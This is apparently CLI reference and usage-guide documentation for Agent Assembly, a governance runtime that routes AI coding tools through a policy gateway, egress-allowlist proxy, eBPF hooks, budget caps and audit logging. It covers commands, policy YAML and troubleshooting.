Exit 0 on a normal start, an idempotent “already running” path, or a clean foreground exit. Exit non-zero if the readiness probe times out or the spawn fails.

Example

aasm start --mode local --port 7391

Agent Assembly gateway started (pid 48213)
  Gateway:    http://localhost:7391
  Dashboard:  http://localhost:7391

aasm stop

Synopsis

aasm stop [OPTIONS]

Options

Flag	Type	Default	Description
`--timeout <TIMEOUT>`	integer (seconds)	`30`	Seconds to wait for graceful shutdown before sending SIGKILL.

Behavior

Resolves the PID file (~/.aasm/gateway.pid) and chooses one of four terminal states — no PID file, stale PID file, graceful SIGTERM, or escalated SIGKILL — always cleaning up the PID file so the next aasm start sees a clean slate.

Example

aasm stop --timeout 15

Sent SIGTERM to pid 48213; exited gracefully.

Last updated: 2026-06-11 by Chisanan232

aasm sandbox

Run a WebAssembly tool inside the Agent Assembly tool-execution sandbox, with filesystem, CPU (instruction fuel), memory, and wall-clock isolation. This surfaces the aa-sandbox runtime to the CLI without going through the cloud /dispatch_tool HTTP route.

Synopsis

aasm sandbox <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`run`	Run a `.wasm` module inside a fresh sandbox.
`info`	Show the default sandbox runtime limits.

aasm sandbox run

Run a WebAssembly module under WASI preview 1 inside a fresh sandbox and report the outcome. Unset limits fall back to the safe-by-default values.

Name	Type	Default	Description
`<WASM>`	path (arg)	—	Path to a `.wasm` module to execute under WASI preview 1.
`--fuel <FUEL>`	integer	`10000000` (10M)	Wasmtime instruction-fuel budget. Raise for long-running tools.
`--memory-pages <MEMORY_PAGES>`	integer	`16` (1 MiB)	Maximum linear-memory pages (1 page = 64 KiB).
`--wall-clock-ms <WALL_CLOCK_MS>`	integer	`5000` (5s)	Wall-clock deadline in milliseconds.

aasm sandbox run ./tool.wasm --fuel 50000000 --wall-clock-ms 10000

Sandbox run: ./tool.wasm
  Outcome:    completed
  Fuel used:  3,201,884 / 50,000,000
  Wall time:  812ms / 10000ms

aasm sandbox info

Show the default sandbox runtime limits. Takes no arguments.

aasm sandbox info

Default sandbox limits:
  Fuel:           10,000,000 units
  Memory pages:   16  (1 MiB)
  Wall clock:     5000 ms

Last updated: 2026-06-11 by Chisanan232

aasm config

Validate and boot an agent-assembly.toml runtime configuration file. These operate on the runtime TOML (storage drivers, etc.) — distinct from the CLI’s own ~/.aa/config.yaml connection profiles (see aasm context).

Synopsis

aasm config <SUBCOMMAND>

Subcommand	Purpose
`validate`	Validate an `agent-assembly.toml` (currently the `[storage]` section).
`boot`	Build the `[storage]` backends and run a sample policy lookup.

aasm config validate

Parse the TOML file and resolve every [storage] driver name against the built-in driver registry. Exits 0 when valid; 1 with the error on stderr otherwise. Unknown sections are ignored.

Argument	Type	Description
`<FILE>`	path	Path to the `agent-assembly.toml` file to validate.

aasm config validate ./agent-assembly.toml

✓ agent-assembly.toml valid — storage driver: memory

aasm config boot

Resolve every [storage] driver through the registry, build each backend, and perform a sample policy lookup to confirm the configuration actually boots. Exits 0 on success; 1 with the error on stderr.

Argument	Type	Description
`<FILE>`	path	Path to the `agent-assembly.toml` file to boot from.

aasm config boot ./agent-assembly.toml

✓ booted storage backends; sample policy lookup OK

Last updated: 2026-06-11 by Chisanan232

aasm context

Manage named API contexts (connection profiles) stored in ~/.aa/config.yaml. A context bundles an API URL and optional API key under a name so you can switch between gateways with --context <name>.

See Config and context resolution for how the active context is resolved.

Synopsis

aasm context <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`list`	List all configured contexts.
`set`	Create or update a named context.
`use`	Switch the default context.

aasm context list

List all configured contexts with their API URLs. Takes no arguments.

aasm context list

NAME         API URL                       DEFAULT
production   https://api.example.com       *
staging      https://staging.example.com

aasm context set

Create or update a named context.

Name	Type	Default	Description
`<NAME>`	string (arg)	—	Name of the context to create or update.
`--api-url <API_URL>`	string	required	API URL for this context.
`--api-key <API_KEY>`	string	—	API key for this context (optional).

aasm context set staging --api-url https://staging.example.com

Saved context 'staging'.

aasm context use

Switch the default context (the one used when --context is not passed).

Argument	Type	Description
`<NAME>`	string	Name of the context to set as default.

aasm context use production

Default context set to 'production'.

Last updated: 2026-06-11 by Chisanan232

aasm admin

Gateway administrative operations. The current scope is manual retention; more admin subcommands are added as the operator surface grows.

Synopsis

aasm admin <SUBCOMMAND> [OPTIONS]

Subcommand	Purpose
`run-retention`	Trigger one manual retention pass against the running gateway.

The subcommand accepts the global options, honoring --output yaml (defaults to pretty JSON).

aasm admin run-retention

Trigger one manual retention pass (POST /api/v1/admin/retention-policy/run). Exits 0 on a successful pass, non-zero when the gateway is unreachable or returns a non-2xx status (the error chain is printed to stderr).

Flag	Type	Default	Description
`--dry-run`	flag	off	Log what would be retained/dropped without taking any action.

aasm admin run-retention --dry-run

{
  "dry_run": true,
  "audit_events_scanned": 14293,
  "audit_events_dropped": 0
}

Last updated: 2026-06-11 by Chisanan232

aasm version

Show CLI and gateway version information. Prints the aasm CLI version, then probes the gateway health endpoint (GET /api/v1/health) for the gateway and API versions. When the gateway is unreachable, the gateway/api rows show an unreachable marker.

Synopsis

aasm version

This command has no subcommands or flags of its own. It honors the global --output and the resolved API context (--api-url / --context).

aasm -V / aasm --version prints only the CLI version (the standard clap flag). aasm version additionally reports the gateway and API versions.

Example

aasm version

COMPONENT   VERSION
cli         0.0.1
gateway     0.0.1
api         0.0.1

JSON form:

aasm version --output json

Last updated: 2026-06-11 by Chisanan232

aasm completion

Generate a shell completion script for aasm and write it to stdout. Source or install the output to get tab-completion for commands, subcommands, and flags.

Synopsis

aasm completion <SHELL>

This command has no subcommands.

Arguments

Argument	Type	Description
`<SHELL>`	shell	Shell to generate completions for. Supported values come from `clap_complete::Shell`: `bash`, `elvish`, `fish`, `powershell`, `zsh`.

Examples

Bash (current session):

source <(aasm completion bash)

Zsh (install into a completions directory on $fpath):

aasm completion zsh > ~/.zfunc/_aasm

Fish:

aasm completion fish > ~/.config/fish/completions/aasm.fish

Last updated: 2026-06-11 by Chisanan232

Usage Guide

This guide walks through the real, day-to-day tasks an operator performs with Agent Assembly, using the aasm CLI, the governance gateway, the three interception layers, and the dashboard. Every command and every screenshot on these pages was produced against the actual 0.0.1-alpha.5 build — where a scenario needs a platform Agent Assembly does not target locally (for example the Linux-only eBPF layer, or the SaaS control-plane API the web dashboard talks to), the page says so explicitly rather than showing a mock-up.

What you can do

Scenario	Goal	Page
Govern an agent	Launch a real AI dev tool under governance, end to end	Govern an agent end-to-end
Egress control	Restrict which hosts an agent may reach, and dry-run it before applying	Enforce an egress policy
Cost control	Set per-team spend caps and watch spend accumulate	Team budgets and cost
Observe	Watch the fleet in the web dashboard and the terminal TUI	Observe in the dashboard
Architecture in practice	Choose and combine the SDK, proxy, and eBPF layers	Choosing interception layers
When things break	Diagnose the most common local failures	Troubleshooting

The shape of every scenario

Agent Assembly governance always has the same three moving parts:

A gateway — the brain. It holds the agent registry, evaluates policy, tracks budgets, and writes the audit log. You start it once.
At least one interception layer — the SDK shim, the aa-proxy sidecar, or the eBPF kernel hooks — that observes what an agent does and asks the gateway for an allow/deny decision.
A policy — a YAML document describing what is allowed: capabilities, network egress, per-tool rules, budgets, and approval gates.

The operator surface for all of this is the aasm binary:

aasm — command-line tool for Agent Assembly

Commands:
  admin       Gateway administrative operations
  agent       Manage monitored agent processes
  alerts      Manage governance alerts
  audit       Query audit log entries and export compliance reports
  logs        Query and stream audit log events
  policy      Manage governance policies
  context     Manage named API contexts (connection profiles)
  config      Validate an `agent-assembly.toml` runtime configuration file
  completion  Generate shell completion scripts
  status      Show fleet health, agents, approvals, and budget at a glance
  version     Show CLI and gateway version information
  trace       Visualize a session trace (tree or timeline)
  approvals   Manage human-in-the-loop approval requests
  cost        Query cost summary and forecast spending
  dashboard   Open an interactive TUI dashboard for real-time governance monitoring
  gateway     Manage the aa-gateway governance daemon
  run         Launch an AI dev tool (claude, codex, copilot, windsurf) with governance wiring
  sandbox     Run a WebAssembly tool inside the Agent Assembly sandbox
  tools       List and manage AI dev tools on this system
  topology    Visualize agent topology, trees, lineage, and statistics
  proxy       Manage the aa-proxy sidecar — lifecycle, CA trust, and log tailing
  start       Start the locally-managed Agent Assembly gateway process
  stop        Stop the locally-managed Agent Assembly gateway process

Two global flags appear in nearly every example below:

--api-url <URL> — where the CLI sends its requests. Defaults to the SaaS control-plane API on http://localhost:8080. When you run the local gateway (aasm start / aa-gateway --mode local) it serves its HTTP API on http://127.0.0.1:7391, so the local-mode examples pass --api-url http://127.0.0.1:7391.
--output <table|json|yaml> — table for humans, json/yaml for scripting.

A note on ports. The gRPC policy server listens on 127.0.0.1:50051 (where SDKs and the proxy connect). The local control-plane HTTP API and the embedded dashboard are served on 127.0.0.1:7391. The full web dashboard’s data API (/api/v1/fleet, /api/v1/policies, …) is provided by the SaaS/cloud control plane on port 8080, which is not part of the open-source local runtime — see Observe in the dashboard for what renders locally and what needs the hosted backend.

Last updated: 2026-06-11 by Bryant

Govern an agent end-to-end

Goal. Take a real AI dev tool on your machine — Claude Code, Codex, Copilot, or Windsurf — and launch it so that everything it does runs through Agent Assembly governance: it is registered with the gateway, tagged to a team and trace, and routed through the proxy so its tool-calls and network requests are policy-checked and audited.

Prerequisites

The aasm binary built (cargo build -p aa-cli; the binary is at ./target/debug/aasm).
The gateway binary on PATH for the aasm start helper (cargo build -p aa-gateway --bin aa-gateway).
At least one supported AI dev tool installed.

Step 1 — See which tools Agent Assembly can govern

aasm discovers the AI dev tools already installed on the system and reports the governance level it can apply to each. This is a real probe of the machine, not a static list:

$ aasm tools list
+---------------+-----------------------+---------------------------------------------------------+------------------+
| TOOL          | VERSION               | PATH                                                    | GOVERNANCE LEVEL |
+====================================================================================================================+
| ClaudeCode    | 2.1.172 (Claude Code) | /opt/homebrew/bin/claude                                | L3Native         |
|---------------+-----------------------+---------------------------------------------------------+------------------|
| Codex         | codex-cli 0.135.0     | /opt/homebrew/bin/codex                                 | L2Enforce        |
|---------------+-----------------------+---------------------------------------------------------+------------------|
| GitHubCopilot | 1.388.0               | /Users/you/.vscode/extensions/github.copilot-1.388.0    | L1Observe        |
+---------------+-----------------------+---------------------------------------------------------+------------------+

The governance level reflects how deeply Agent Assembly can integrate with that tool — from L3Native (the tool exposes a hook the runtime wires into directly) down to L1Observe (the runtime can observe but not natively intercept, so the proxy and eBPF layers do the enforcing).

Step 2 — Start the gateway

The gateway is the decision engine every governed action is checked against. For a local, in-process control plane:

$ aasm start --mode local --port 7391

This serves the HTTP control-plane API and the dashboard on http://127.0.0.1:7391 with a local SQLite store. You can confirm it is up:

$ aasm --api-url http://127.0.0.1:7391 status
Agent Assembly Status
─────────────────────────────────────
  Mode:      local
  Gateway:   http://127.0.0.1:7391
  Storage:   sqlite
  Version:   0.0.1-alpha.5
  Uptime:    2m 24s
  Health:    ✓ ok
─────────────────────────────────────

STORAGE
───────
  Backend:     sqlite
  Path:        /Users/you/.aasm/local.db
  DB Health:   ✓ ok  (0ms)
  Rows:        audit_events: 0 hot
               agents: 0  |  policies: 0

The fleet starts empty (agents: 0) — nothing is governed until you launch a tool under aasm run in the next step.

Step 3 — Launch the tool under governance

aasm run <tool> is the heart of this scenario. It assigns the session an agent identity, a team, and a trace id for lineage tracking, wires in the proxy, and then execs the real tool. Before running it for real, use --dry-run to see exactly what governance wiring will be applied — nothing is launched:

$ aasm run claude --team-id research --agent-id research-bot-01 --dry-run
--- aasm run dry-run ---
agent_id:    research-bot-01
trace_id:    dry-run-daa9d73a-f2fc-4977-9d00-50f4c4025fa9
session_id:  dry-run-0d7a0c16-25b2-456b-84e8-b7907fa963d1

--- managed settings ---
<dry-run: managed settings not generated>

--- launch command ---
claude

--- environment ---
AA_AGENT_ID=research-bot-01
AA_REGISTRATION_ID=dry-run-2b00ef56-3f35-4ef9-8164-ea899dfe90aa
AA_SESSION_ID=dry-run-0d7a0c16-25b2-456b-84e8-b7907fa963d1
AA_TEAM_ID=research
AA_TRACE_ID=dry-run-daa9d73a-f2fc-4977-9d00-50f4c4025fa9
AI_AGENT=claude-code_2-1-165_agent
CLAUDECODE=1
CLICKUP_API_TOKEN=***MASKED***
GITHUB_TOKEN=***MASKED***
JIRA_API_TOKEN=***MASKED***
SLACK_BOT_TOKEN=***MASKED***
...

Notice two things that are doing real work:

The AA_* environment variables (AA_AGENT_ID, AA_TEAM_ID, AA_TRACE_ID, AA_REGISTRATION_ID, AA_SESSION_ID) are injected so the launched tool’s events carry identity and lineage back to the gateway.
Secret-looking environment variables in your shell — API tokens, PATs — are masked (***MASKED***) in the launch environment that gets logged, so credentials never leak into the audit trail.

When you drop --dry-run, the same wiring is applied for real and the tool starts. Useful flags:

Flag	Effect
`--team-id <id>`	Tag the session to a team (drives team budgets and topology).
`--governance-level <level>`	Override the level Agent Assembly applies.
`--enforcement-mode observe` (or `--observe`)	Compute and audit policy decisions but never block — a shadow run.
`--enforcement-mode enforce`	Default — deny blocks, redact strips.
`--no-proxy`	Skip proxy injection (not recommended for governed environments).
`--root-agent <id>`	Record a parent for multi-agent lineage.

The --enforcement-mode distinction matters when rolling governance out: start with --observe to see what would be blocked without breaking the agent, then switch to enforce once the policy is right.

Step 4 — Observe the governed agent

Once the tool is running under aasm run, the registered agent appears in the fleet and its actions flow into the audit log. You inspect it with:

$ aasm agent list                 # all registered agents
$ aasm agent inspect <agent-id>   # one agent in detail
$ aasm topology team research     # the whole team
$ aasm status                     # fleet health at a glance

and watch its decisions live via the dashboard — see Observe in the dashboard.

Result

You now have a real AI tool running with a stable governed identity, every tool-call and outbound request routed through the gateway for an allow/deny decision, secrets scrubbed from the recorded environment, and a complete audit trail keyed to the agent, team, and trace you assigned in Step 3.

Last updated: 2026-06-11 by Bryant

Enforce an egress policy

Goal. Restrict the hosts an agent is allowed to reach, so a prompt-injected or confused agent cannot exfiltrate data to an arbitrary endpoint. You author a network allowlist, dry-run it against recorded traffic before applying it, and then enforce it at the proxy layer.

How egress enforcement works

Network egress is the job of the sidecar proxy (aa-proxy), the second of the three interception layers. It terminates outbound HTTPS with a per-host CA (MitM) and, for every CONNECT, asks: is this host on the policy’s allowlist? Hosts that fail the check are refused before any bytes leave the machine — no code change in the agent required.

The allowlist lives in the network section of a policy:

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: egress-allowlist
  version: "1.0.0"
spec:
  network:
    allowlist:
      - api.openai.com
      - "*.githubusercontent.com"

Allowlist matching semantics

The proxy matches each requested host against every allowlist entry using these rules (from aa_core::policy::is_host_allowed_by_egress_allowlist):

Pattern	Matches	Does not match
`api.openai.com`	`api.openai.com` (case-insensitive, exact)	`evil.api.openai.com`
`*.githubusercontent.com`	`raw.githubusercontent.com`, `objects.githubusercontent.com`	bare `githubusercontent.com`
`*`	every host	—
(empty allowlist)	every host (no restriction)	—

The leftmost-label wildcard (*.example.com) requires at least one extra label to the left and anchors on the right, so it cannot be fooled by an attacker-crafted host like example.com.evil.net.

Step 1 — Validate the policy locally

Validation parses and type-checks the YAML without contacting a gateway, and warns about unrecognised keys so you catch typos early:

$ aasm policy validate egress-policy.yaml
Policy is valid: egress-policy.yaml

Step 2 — Dry-run against recorded traffic

aasm policy simulate replays an audit-log JSONL file through the policy engine and reports what each event would have decided — without enforcing anything. This is how you prove a new allowlist before it can break production traffic.

A replay file is one JSON object per line; each line is an audit event whose payload is the serialized governance action. For egress, the action is a NetworkRequest:

{"event_type":"ToolCallIntercepted","agent_id":"researcher-1","payload":"{\"NetworkRequest\":{\"url\":\"https://api.openai.com/v1/chat/completions\",\"method\":\"POST\"}}"}
{"event_type":"ToolCallIntercepted","agent_id":"researcher-1","payload":"{\"NetworkRequest\":{\"url\":\"https://evil.example.com/exfil\",\"method\":\"POST\"}}"}
{"event_type":"ToolCallIntercepted","agent_id":"researcher-1","payload":"{\"NetworkRequest\":{\"url\":\"https://raw.githubusercontent.com/org/repo/main/README.md\",\"method\":\"GET\"}}"}

Run the simulation:

$ aasm policy simulate --policy egress-policy.yaml --against traffic.jsonl
Simulation Report
--------------------------------------------------
Total events:       3
Allowed:            1
Denied:             2
Approval required:  0

EVENT#   ACTION               DECISION     REASON
----------------------------------------------------------------------
1        net:POST:https://evil.example.com/exfil deny         host not in network allowlist
2        net:GET:https://raw.githubusercontent.com/org/repo/main/README.md deny         host not in network allowlist

The report lists the flagged (non-allow) outcomes. api.openai.com (event 0) was allowed and so does not appear in the flagged list; the exfiltration attempt to evil.example.com was denied, as expected.

Honest caveat — two matchers, one allowlist. The raw.githubusercontent.com request was denied by the simulator above even though *.githubusercontent.com is on the allowlist. That is because the policy simulate decision path matches the host with an exact string comparison, whereas the live aa-proxy CONNECT path uses the glob-aware matcher described in the table above (which would allow it). When validating wildcard egress rules, confirm the live proxy behaviour as well as the simulation; treat a simulation deny on a wildcard host as “verify against the proxy”, not necessarily a real block.

For scripting and CI gating, write the structured report to a file and key off the exit status:

$ aasm policy simulate --policy egress-policy.yaml --against traffic.jsonl \
    --output-file report.json
$ cat report.json
{
  "total_events": 3,
  "denied": 2,
  "allowed": 1,
  "approval_required": 0,
  "budget_impact_usd": null,
  "flagged_outcomes": [
    { "event_index": 1, "action": "net:POST:https://evil.example.com/exfil",
      "decision": "deny", "reason": "host not in network allowlist" },
    { "event_index": 2, "action": "net:GET:https://raw.githubusercontent.com/org/repo/main/README.md",
      "decision": "deny", "reason": "host not in network allowlist" }
  ]
}

You can also dry-run against live traffic for a fixed window instead of a file:

$ aasm policy simulate --policy egress-policy.yaml --live --duration 60s

Step 3 — Enforce at the proxy

Bring up the sidecar and trust its CA so TLS interception works:

$ aasm proxy install-ca          # add the per-host CA to the OS trust store
$ aasm proxy start               # listens on 127.0.0.1:8899 by default
$ aasm proxy status

aasm proxy start accepts --listen <addr> (default 127.0.0.1:8899), --gateway <url> to point it at the gateway that owns the policy, and --ca-dir <dir> for CA storage. Agents launched via aasm run have the proxy injected automatically (Step 3 of Govern an agent end-to-end); for other processes, route their HTTPS through the proxy address.

When the policy is applied, the proxy refuses any CONNECT to a host outside the allowlist and the refusal is written to the audit log.

Result

Outbound traffic is now constrained to an explicit allowlist, verified with a dry-run before it could affect a running agent, and enforced at the network layer without modifying the agent’s code.

Last updated: 2026-06-11 by Bryant

Team budgets and cost

Goal. Put a hard spend cap on what an agent (and a team) can burn on model calls, so a runaway planning loop cannot run up an unbounded bill — and watch spend accumulate against that cap.

How budgets work

The gateway tracks per-agent and per-team spend and evaluates it on every governed model call. Budgets are declared in the budget section of a policy. These are the real fields the gateway parses:

apiVersion: agent-assembly/v1
kind: Policy
metadata:
  name: research-budget
  version: "1.0.0"
spec:
  budget:
    daily_limit_usd: 25.0          # per-agent cap, resets each day
    monthly_limit_usd: 400.0       # per-agent cap, resets each month
    org_daily_limit_usd: 100.0     # organisation-wide daily cap
    org_monthly_limit_usd: 2000.0  # organisation-wide monthly cap
    timezone: "Asia/Taipei"        # IANA tz for the reset boundary (default UTC)
    action_on_exceed: deny         # "deny" (default) or "suspend"
    window: "1h"                   # optional sub-day rollover window (humantime)

Field	Meaning
`daily_limit_usd` / `monthly_limit_usd`	Per-agent spend caps. Omit for no limit.
`org_daily_limit_usd` / `org_monthly_limit_usd`	Organisation-wide caps, enforced independently of the per-agent caps.
`timezone`	IANA timezone that defines the daily/monthly reset boundary. Defaults to UTC.
`action_on_exceed`	What happens when the cap is hit: `deny` blocks further spend (default), `suspend` suspends the agent.
`window`	Optional sub-day rollover (e.g. `"5s"`, `"30m"`, `"1h30m"`). When absent, spend rolls over at the calendar-day boundary.

Step 1 — Validate and apply the budget policy

$ aasm policy validate research-budget.yaml
Policy is valid: research-budget.yaml

$ aasm policy apply research-budget.yaml --applied-by alice@example.com

policy apply saves the policy to version history (see aasm policy history / aasm policy rollback), so a budget change is auditable and reversible.

Step 2 — Watch spend against the cap

aasm cost summary reports spend for the current period. By default it shows today; pass --period month for the month, and --group-by agent to break it down per agent:

$ aasm cost summary --period today
$ aasm cost summary --period month --group-by agent

Each command takes --output json|yaml for scripting.

To see where spend is heading, aasm cost forecast projects the month from the current daily rate:

$ aasm cost forecast

The fleet-level aasm status view also surfaces a budget block at a glance:

BUDGET STATUS
─────────────
  Daily spend : $-- (no limit set)
  Date:           --
  (no per-agent data)

(The example above is from a fresh gateway with no budget applied and no spend yet — once a budget policy is applied and agents start spending, the daily spend and per-agent rows populate.)

Step 3 — See budgets in topology

aasm topology team <team-id> lists every agent in a team; add --show-budget to include each agent’s governance/budget posture in the tree:

$ aasm topology team research --show-budget

What happens at the cap

When an agent reaches its daily_limit_usd (or the org cap), the gateway applies action_on_exceed:

deny — the offending model call is denied and audited. The agent keeps running but cannot spend until the window resets.
suspend — the agent is suspended (you can later aasm agent resume <id>).

Either way the decision lands in the audit log, so cost overruns are accountable after the fact, not just blocked in the moment.

Result

The team now has enforceable per-agent and organisation-wide spend caps with a defined reset boundary and a clear over-budget action, plus CLI views to track actual spend and forecast the month.

Last updated: 2026-06-11 by Bryant

Observe in the dashboard

Goal. Watch the governed fleet in real time. Agent Assembly ships two observation surfaces from the same aasm binary: a web dashboard (a Vite/React SPA) and an in-terminal TUI. This page shows what each looks like and how to bring it up.

The web dashboard

The dashboard is a single-page React app. In production it is embedded into the gateway and served at /; for UI development it runs under Vite on port 3000 and proxies /api to the control-plane API on port 8080.

Bring it up locally

The local-mode gateway serves the compiled SPA on its HTTP port (7391 by default). Build the dashboard bundle once, then start the gateway pointed at it:

$ cd dashboard && pnpm install && pnpm build      # produces dashboard/dist/
$ cd .. && aasm start --mode local --port 7391
# the dashboard is now at http://127.0.0.1:7391/

The dashboard authenticates with an API key. This screen renders entirely client-side, so it is the same whether or not a backend is reachable:

Dashboard login — API key entry

After authenticating, the canonical 12-route navigation appears, grouped into Monitor (Overview, Fleet, Topology, Live Ops, Alerts, Audit Log), Control (Capability, Policy, Secret Scrubbing), and Manage (Cost & Budget, Agent Groups, Members & Access). The header carries the approvals indicator, a light/dark theme toggle, Settings, and Log out:

Dashboard app shell — Overview route with the full governance navigation

An implemented page — Policies

The Policies page is the visual policy builder. It shows All / Active / Proposed tabs and a + new policy action; opening a row drops into the editor:

Dashboard Policies page — visual builder with All / Active / Proposed tabs

More implemented routes — Live Ops and Topology

The Live Operations route renders the real-time governance layout: the L1→L2→L3 traffic pipeline (Identity → Capability → Scrub → External), a tail -f event stream with agent/team/op-type/status filters and an auto-scroll toggle, and the approval queue. Against the local-mode gateway the event stream shows “reconnecting…” (no backend feed) and the columns are empty, but the full operator layout is real:

Dashboard Live Operations — traffic pipeline, event stream, and approval queue

The Topology route lists agents and teams; here it honestly reports 0 agents · 0 teams because the fleet data API is not part of the local runtime:

Dashboard Topology — agent/team map, empty in local mode

Light and dark themes

The header theme toggle flips the entire token-driven UI between light and dark. Here is the Overview route in dark mode:

Dashboard in dark mode — Overview route with the dark theme applied

Honest caveat — what renders locally vs. what needs the hosted backend. The screenshots above are all real captures of the 0.0.1-alpha.5 SPA served by the local-mode gateway. The data panels are empty (zero policies, zero agents, “not implemented yet” on some routes) because the dashboard’s data API — /api/v1/fleet, /api/v1/policies, /api/v1/capability/matrix, and the auth-token endpoint — is provided by the SaaS/cloud control plane on port 8080, which is not part of the open-source local runtime. The local-mode gateway on 7391 serves the SPA and a small set of endpoints (/healthz, /api/v1/admin/status), so the chrome, navigation, theming, and page shells are fully real while the populated tables require the hosted backend. Routes still marked “not implemented yet” (e.g. Overview) render a ComingSoon placeholder by design in this build.

The terminal TUI

For operators who live in a terminal, aasm dashboard (no subcommand) launches an interactive full-screen TUI built on ratatui, with a live feed and keyboard-driven approval handling:

$ aasm dashboard
# ...full-screen TUI; press 'q' to quit

Open an interactive TUI dashboard for real-time governance monitoring

Usage: aasm dashboard [OPTIONS] [COMMAND]

Commands:
  start  Serve the embedded SPA at http://127.0.0.1:<port>. Blocks until Ctrl-C
  open   Open the browser to an already-running dashboard
  stop   Stop a dashboard server started with `aasm dashboard start`

The TUI polls the control-plane REST API and subscribes to a WebSocket feed for live events; selecting a pending approval lets you approve or reject it inline (y / n).

Honest caveat — no live TUI screenshot here. The TUI requires an interactive terminal (it switches to the alternate screen and raw mode) and a reachable events/approvals API (port 8080) to display populated panels. Driven headlessly against the empty local backend it renders the frame but with no data to show, so a meaningful still capture is not reproducible in this environment — the launch command and --help above are real, and the panels populate once the hosted control plane (or a backend with live agents) is connected.

Serving the SPA without a browser launch helper

aasm dashboard start serves the embedded SPA directly and blocks until Ctrl-C; aasm dashboard open opens your browser to an already-running server, and aasm dashboard stop stops a server started with start. Pass --port (or set AASM_DASHBOARD_PORT) to choose the port, and --open to launch the browser once it is ready.

Result

You can observe the fleet either in the browser (rich, point-and-click) or in the terminal (fast, keyboard-driven), both from the same binary and both backed by the same gateway.

Last updated: 2026-06-12 by Chisanan232

Choosing interception layers

Goal. Decide which of the three interception layers to deploy, and how to combine them, for a given governance requirement. Agent Assembly enforces policy through three independently-deployable layers; this page is about the practical trade-offs, with the real commands for each.

The three layers at a glance

Listed lowest-latency-cost first, highest-detection-authority first:

Layer	What it is	Catches	Cost / requirement
1. SDK (in-process)	A thin Rust shim (`aa-ffi-*` over `aa-sdk-client`) the language SDKs call. Emits events to the gateway and applies pre-execution allow/deny via wrapper functions.	Anything the instrumented code path does.	Lowest latency, but requires the agent to adopt the SDK.
2. Proxy sidecar (`aa-proxy`)	Intercepts outbound HTTPS via MitM with a per-host CA. Enforces network-egress policy with no code change.	Anything the SDK misses that goes over the network.	No code change; requires trusting the proxy CA.
*3. eBPF (`aa-ebpf`)**	Kernel hooks: uprobes on SSL libraries, kprobes/tracepoints on `exec`/file syscalls.	Everything else, including deliberate bypass attempts.	Highest authority; Linux-only.

The gateway is the common brain for all three — every layer asks the same policy engine for its decision and writes to the same audit log.

When to use each

Reach for the SDK layer when you control the agent’s code and want the lowest-overhead, most precise instrumentation — it sees tool-call arguments and results directly, in process.
Add the proxy when you cannot or do not want to modify the agent, and the risk you care about is network egress / data exfiltration. It is the most practical way to govern a third-party or closed-source tool. See Enforce an egress policy.
Add eBPF when you need defense-in-depth that an agent cannot bypass — e.g. it shells out, writes files, or makes raw connections that skip both the SDK and the proxy. This is the catch-all backstop.

Combining layers

The layers are additive, not exclusive. A typical governed deployment runs the SDK and the proxy: the SDK gives rich, in-process tool-call governance, while the proxy backstops the network path for anything the SDK does not see. On Linux, eBPF sits underneath both as the bypass-proof floor.

aasm run reflects this in its governance level (see Govern an agent end-to-end): a tool reported as L3Native integrates at the SDK depth, while an L1Observe tool relies on the proxy and eBPF layers to do the actual enforcing.

Layer 2 in practice — the proxy

$ aasm proxy install-ca      # trust the per-host CA so TLS interception works
$ aasm proxy start           # background sidecar on 127.0.0.1:8899
$ aasm proxy status          # confirm it is running
$ aasm proxy logs            # tail the proxy log
$ aasm proxy uninstall-ca    # remove the CA when you are done

aasm proxy start takes --listen <addr> (default 127.0.0.1:8899), --gateway <url>, and --ca-dir <dir>.

Layer 3 in practice — eBPF

The eBPF layer is Linux-only: its uprobes/kprobes/tracepoints attach to a running kernel.

$ aasm proxy status
not running

On macOS the eBPF userspace crate compiles with non-Linux stubs (the KprobeManager/UprobeManager attach paths are #[cfg(target_os = "linux")]), so it builds for development but does not attach probes. To exercise the real kernel hooks — SSL-library uprobes for outbound TLS, exec/openat/unlink kprobes, and the sched_process_exec tracepoint — run on Linux.

Honest caveat. This page does not show live eBPF probe output because the attaching code is gated to Linux and this build was exercised on macOS. The architecture (userspace aa-ebpf loading compiled aa-ebpf-probes and reading a shared BPF ring buffer) is real and documented in the crate; the live capture requires a Linux host with the privileges to load eBPF programs.

Result

You can match the interception layer (or stack of layers) to the requirement: SDK for precision where you own the code, proxy for code-free egress control, eBPF for a bypass-proof kernel backstop on Linux — all feeding one gateway and one audit log.

Last updated: 2026-06-11 by Bryant

Runnable examples

The pages in this guide explain how governance works. When you want to run it, the framework-specific, end-to-end examples live in the dedicated agent-assembly-examples repository rather than in this book — that keeps the runnable code versioned and testable on its own, while these pages stay focused on the concepts.

Every example is governed by the same three-layer interception model described in Choosing interception layers: a gateway as the brain, at least one interception layer (SDK shim, aa-proxy sidecar, or eBPF), and a policy. Pick the language you are integrating, or browse the cross-cutting scenarios:

Node — examples-repo/node
Python — examples-repo/python
Go — examples-repo/go
Scenarios (cross-cutting: approval-gates, audit-trace, budget-limits, policy-enforcement, sidecar-runtime) — examples-repo/scenarios

Last updated: 2026-06-14 by Chisanan232

Troubleshooting

Common local issues and the real diagnostics to resolve them. Every error message below is reproduced verbatim from the 0.0.1-alpha.5 build.

`aasm start` fails: “failed to spawn aa-gateway”

$ aasm start --mode local --port 7391
aasm start: failed to spawn aa-gateway: No such file or directory (os error 2)

Cause. aasm start shells out to a separate aa-gateway binary, which must be on your PATH.

Fix. Build it and put target/debug on PATH:

$ cargo build -p aa-gateway --bin aa-gateway
$ export PATH="$PWD/target/debug:$PATH"
$ aasm start --mode local --port 7391

`aasm start` fails: “–policy is required in legacy-grpc mode”

$ aasm start
Error: "--policy is required in legacy-grpc mode"
aasm start: gateway did not become ready within 5.000335375s

Cause. The aa-gateway binary defaults to its legacy gRPC mode, which requires a policy file. For a local control plane with the HTTP API and dashboard, you want local mode, which does not.

Fix. Run local mode directly:

$ aa-gateway --mode local
Agent Assembly [local mode] v0.0.1-alpha.5
  Listening:  http://127.0.0.1:7391
  Dashboard:  http://127.0.0.1:7391/
  Storage:    /Users/you/.aasm/local.db (SQLite)

  Ctrl+C to stop.

For the legacy gRPC server, supply a policy: aa-gateway --policy policy-examples/low-risk.yaml.

CLI commands say the gateway is “unreachable”

$ aasm status
Agent Assembly Status
─────────────────────────────────────
  Gateway:   http://localhost:8080
  Health:    ✗ unreachable
─────────────────────────────────────
...
Error: gateway is not running. Start it with: aasm start

$ aasm version
+-----------+---------------+-------------+
